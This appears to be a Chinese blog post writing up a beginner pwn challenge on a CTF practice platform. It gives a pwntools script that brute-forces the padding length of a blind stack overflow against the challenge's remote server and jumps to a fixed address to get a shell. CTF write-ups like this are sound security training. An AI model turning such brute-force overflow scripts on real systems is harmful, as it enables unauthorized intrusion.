攻防世界 - pwn - warmup

接觸的比較少的盲打類型,算是積累經(jīng)驗吧,用到的漏洞是棧溢出,需要考慮64位和32位系統(tǒng)兩種情況,并用try except做自動化的測試。

exp:

from pwn import *

# context.log_level = "debug"
shell = 0x40060d

for i in range(1000):
    r = remote("111.200.241.244", 62243)
    log.info("payload lenth:" + str(i))
    try:
        r.sendlineafter(b">", cyclic(i) + p64(shell))
        print(r.recv())
    except:
        pass

64位沒跑通換32位即可。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內(nèi)容

  • 歇了很長一段時間,終于開始了我的攻防世界pwn之路。立一個flag:每日一題,只能多不能少。 0x00 dice_...
    Adam_0閱讀 7,343評論 2 7
  • 0x00 get_shell 0x01 CGfsb 首先檢查保護 nc連接輸入信息為aaaa加很多個控制字符發(fā)現(xiàn)p...
    Adam_0閱讀 8,035評論 0 30
  • 0x01get_shell 下載附件后直接丟IDA F5 0x02CGfsb 先用checksec查看開了哪些保護...
    Zerek_W閱讀 1,107評論 0 0
  • 格式化字符串漏洞加棧溢出,先看main函數(shù)邏輯: 程序中有cat flag的函數(shù),只需棧溢出后修改返回地址。1為棧...
    阿X_e0ec閱讀 690評論 0 0
  • 就按照題目的難易程度寫 新手區(qū)沒有涉及到棧的相關知識,幾乎是棧漏洞 get_shell 第一個題目比較簡單 ida...
    Hexad閱讀 1,006評論 0 0

友情鏈接更多精彩內(nèi)容